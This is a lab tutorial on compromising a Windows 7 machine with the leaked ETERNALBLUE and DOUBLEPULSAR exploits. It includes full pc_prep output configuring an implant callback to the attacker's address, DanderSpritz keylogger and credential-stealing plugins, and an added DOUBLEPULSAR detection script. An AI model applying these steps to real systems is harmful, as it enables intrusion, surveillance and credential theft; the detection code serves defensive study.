
How to use the DanderSpritz tool (available with Kerberos)

Tutorial by MisterCh0c

I set up a lab with two Windows 7 machines (32-bit, but it should work on 64-bit too), one for the attacker and one for the victim. I am using the FUZZBUNCH tool from the leak, which is an exploit framework somewhat like Metasploit: you use it to run exploits. Let's use the ETERNALBLUE exploit (the SMBv1 bug fixed by MS17-010) to take over the victim machine.


After that we have several options. We can run shellcode on the machine, or any DLL or EXE. In this case I wanted to try out the DanderSpritz tool. It comes with "pc_prep", another utility that generates payloads for the implant DanderSpritz talks to, a.k.a. PEDDLECHEAP.

Complete output of pc_prep:
01:06:52>> pc_prep -sharedlib
[01:06:52] ID: 2744 'python' started [target: z0.0.0.20]
- Possible payloads:
-      0) - Quit
-      1) - Standard TCP (i386-winnt Level3 sharedlib)
-      2) - HTTP Proxy (i386-winnt Level3 sharedlib)
-      3) - Standard TCP (x64-winnt Level3 sharedlib)
-      4) - HTTP Proxy (x64-winnt Level3 sharedlib)
-      5) - Standard TCP Generic (i386-winnt Level4 sharedlib)
-      6) - HTTP Proxy Generic (i386-winnt Level4 sharedlib)
-      7) - Standard TCP AppCompat-enabled (i386-winnt Level4 sharedlib)
-      8) - HTTP Proxy AppCompat-enabled (i386-winnt Level4 sharedlib)
-      9) - Standard TCP UtilityBurst-enabled (i386-winnt Level4 sharedlib)
-     10) - HTTP Proxy UtilityBurst-enabled (i386-winnt Level4 sharedlib)
-     11) - Standard TCP WinsockHelperApi-enabled (i386-winnt Level4 sharedlib)
-     12) - HTTP Proxy WinsockHelperApi-enabled (i386-winnt Level4 sharedlib)
-     13) - Standard TCP (x64-winnt Level4 sharedlib)
-     14) - HTTP Proxy (x64-winnt Level4 sharedlib)
-     15) - Standard TCP AppCompat-enabled (x64-winnt Level4 sharedlib)
-     16) - HTTP Proxy AppCompat-enabled (x64-winnt Level4 sharedlib)
-     17) - Standard TCP WinsockHelperApi-enabled (x64-winnt Level4 sharedlib)
-     18) - HTTP Proxy WinsockHelperApi-enabled (x64-winnt Level4 sharedlib)
Pick the payload type
1
Update advanced settings
NO
Perform IMMEDIATE CALLBACK?
YES
Enter the PC ID [0]
0
Do you want to LISTEN?
YES
Change LISTEN PORTS?
NO
Enter the callback address (127.0.0.1 = no callback) [127.0.0.1]
192.168.0.118
Change CALLBACK PORTS?
NO
Change exe name in version information?
NO
- Pick a key
-   0) Exit
-   1) Create a new key
-   2) Default
Enter the desired option
2
- Configuration:
- 
- <?xml version='1.0' encoding='UTF-8' ?>
- <PCConfig>
-   <Flags>
-     <PCHEAP_CONFIG_FLAG_CALLBACK_NOW/>
-     <PCHEAP_CONFIG_FLAG_DONT_CREATE_WINDOW/>
-   </Flags>
-   <Id>0x0</Id>
-   <CallbackAddress>192.168.0.118</CallbackAddress>
- </PCConfig>
- 
Is this configuration valid
YES
Do you want to configure with FC?
NO
- Configured binary at:
-   D:\Logs\test\z0.0.0.20/Payloads/PeddleCheap_2017_04_16_01h06m59s.760/PC_Level3_dll.configured

Now that we have our DLL payload we can start the listener in DanderSpritz:


Upload our payload DLL to the target through the DOUBLEPULSAR backdoor that ETERNALBLUE installed:

And now we have a connection:
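The step above relies on the DOUBLEPULSAR backdoor already sitting in the victim's SMB service. A defender can test for it without touching the host further, because the implant hooks the SMB1 Trans2 SESSION_SETUP subcommand and answers such a request with the Multiplex ID raised by 0x10 (we send 0x41, an infected host replies 0x51, a clean host echoes 0x41). The following checker is an added example for this page, not code from the tutorial or from the leaked toolkit. It builds the anonymous SMB1 handshake (negotiate, null session, IPC$ tree connect) from the [MS-CIFS] layouts and then sends the Trans2 ping. The PID 0xFEFF, the "Windows 2000" OS strings and the 12 zero parameter bytes are arbitrary constants chosen here; the architecture guess from the SecurityFeatures field is the heuristic public scanners use, not something documented in the leak.

```python
#!/usr/bin/env python3
"""Offline-testable DOUBLEPULSAR SMB 'ping' check (added example, not from the tutorial)."""
import socket
import struct
import sys

SMB_MAGIC = b"\xffSMB"
MID_PING = 0x41       # MID we place in the Trans2 request
MID_INFECTED = 0x51   # MID the implant answers with (request MID + 0x10)


def smb_header(command, tid=0, uid=0, mid=MID_PING, flags2=0xC007):
    """32-byte SMB1 header: Flags 0x18, no signing, PID 0xFEFF (arbitrary value)."""
    return SMB_MAGIC + struct.pack("<BIBHH8sHHHHH", command, 0, 0x18, flags2,
                                   0, b"\x00" * 8, 0, tid, 0xFEFF, uid, mid)


def nbss(smb):
    """NetBIOS session message framing: type 0x00 followed by a 3-byte length."""
    return struct.pack(">I", len(smb)) + smb


def negotiate_request():
    """SMB_COM_NEGOTIATE offering the classic dialects up to NT LM 0.12."""
    dialects = b"".join(b"\x02" + d + b"\x00" for d in
                        (b"LANMAN1.0", b"LM1.2X002", b"NT LANMAN 1.0", b"NT LM 0.12"))
    body = struct.pack("<BH", 0, len(dialects)) + dialects      # WordCount 0, ByteCount
    return nbss(smb_header(0x72, flags2=0x2801) + body)


def session_setup_request():
    """SMB_COM_SESSION_SETUP_ANDX as an anonymous (null) session: 13 parameter words."""
    strings = b"\x00" + b".\x00" + b"Windows 2000 2195\x00" + b"Windows 2000 5.0\x00"
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 0xFFDF, 2, 1, 0, 0, 0, 0, 0x40)
    body = bytes([13]) + words + struct.pack("<H", len(strings)) + strings
    return nbss(smb_header(0x73) + body)


def tree_connect_request(host, uid):
    """SMB_COM_TREE_CONNECT_ANDX to IPC$ using the UID the server issued."""
    path = ("\\\\%s\\IPC$" % host).encode() + b"\x00"
    strings = b"\x00" + path + b"?????\x00"                 # password, path, service
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)         # no AndX, flags 0, pw len 1
    body = bytes([4]) + words + struct.pack("<H", len(strings)) + strings
    return nbss(smb_header(0x75, uid=uid) + body)


def trans2_session_setup_request(tid, uid):
    """SMB_COM_TRANSACTION2 with Setup[0] = 0x000E (SESSION_SETUP): the implant 'ping'."""
    # TotalParamCount, TotalDataCount, MaxParamCount, MaxDataCount, MaxSetupCount,
    # Reserved, Flags, Timeout, Reserved2, ParamCount, ParamOffset, DataCount,
    # DataOffset, SetupCount, Reserved3, Setup[0]
    words = struct.pack("<HHHHBBHIHHHHHBBH", 12, 0, 1, 0, 0, 0, 0, 0, 0,
                        12, 66, 0, 78, 1, 0, 0x000E)
    data = b"\x00" + b"\x00" * 12        # 1 pad byte, then 12 parameter bytes at offset 66
    body = bytes([15]) + words + struct.pack("<H", len(data)) + data
    return nbss(smb_header(0x32, tid=tid, uid=uid, mid=MID_PING) + body)


def parse_smb_response(packet):
    """Extract command, status, SecurityFeatures, TID, UID and MID from a framed reply."""
    if len(packet) < 36 or packet[4:8] != SMB_MAGIC:
        raise ValueError("not an SMB1 message")
    cmd, status, _f, _f2, _pidhi, sig, _res, tid, _pid, uid, mid = \
        struct.unpack("<BIBHH8sHHHHH", packet[8:36])
    return {"command": cmd, "status": status, "signature": sig,
            "tid": tid, "uid": uid, "mid": mid}


def classify_trans2_reply(packet):
    """Verdict for the reply to our Trans2 ping, based purely on the echoed MID."""
    r = parse_smb_response(packet)
    if r["command"] != 0x32:
        return "unexpected reply (command 0x%02x)" % r["command"]
    if r["mid"] == MID_INFECTED:
        return "DOUBLEPULSAR implant present"
    if r["mid"] == MID_PING:
        return "clean"
    return "unknown MID 0x%04x" % r["mid"]


def implant_arch(signature):
    """Heuristic from public scanners: the implant stores its XOR key in the 8-byte
    SecurityFeatures field; on 32-bit targets the upper four bytes stay zero."""
    value = struct.unpack("<Q", signature)[0]
    return "x86" if value & 0xFFFFFFFF00000000 == 0 else "x64"


def scan(host, port=445, timeout=5.0):
    """Negotiate, null session, IPC$ tree connect, then the Trans2 ping."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        def exchange(pkt):
            s.sendall(pkt)
            return s.recv(4096)
        exchange(negotiate_request())
        uid = parse_smb_response(exchange(session_setup_request()))["uid"]
        tid = parse_smb_response(exchange(tree_connect_request(host, uid)))["tid"]
        reply = exchange(trans2_session_setup_request(tid, uid))
    verdict = classify_trans2_reply(reply)
    if verdict.startswith("DOUBLEPULSAR"):
        verdict += " (%s)" % implant_arch(parse_smb_response(reply)["signature"])
    return verdict


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: %s <host>" % sys.argv[0])
    print(scan(sys.argv[1]))
```

Run it as `python3 dp_check.py <victim-ip>` from the attacker box against the lab victim before and after the DOUBLEPULSAR step to see the verdict flip. Only the MID is used for the verdict; the architecture line is extra context and should not be trusted on its own.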

Right after the connection is established an automatic "survey" runs. It collects information about the system, tries to crack passwords, looks for PSPs ("Personal Security Products", i.e. antivirus and other endpoint protection) and so on, and saves everything into log files.

PSP found

Once the connection is made you have various options in the DanderSpritz GUI, such as taking screenshots, browsing files, managing processes, etc.

But the most interesting parts are the plugins available in the "Terminal" window.

Here are some of them:

  • YAK: installs a keylogger
  • ripper: steals information from Skype, Firefox and Chrome
  • runassystem: does what it says

Here's a full list of all the commands:

https://docs.google.com/document/d/1BL-bxQfKZPXM8qi_UPLyZlONLaYXdAm0dVWpGh00sO8/edit?usp=sharing

Voilà, that was just a quick overview. There are a lot more exploits and files to look into, and I'm sure what researchers find in the future will be interesting (:

YAK Keylogger in action
Taking a screenshot of the victim’s desktop
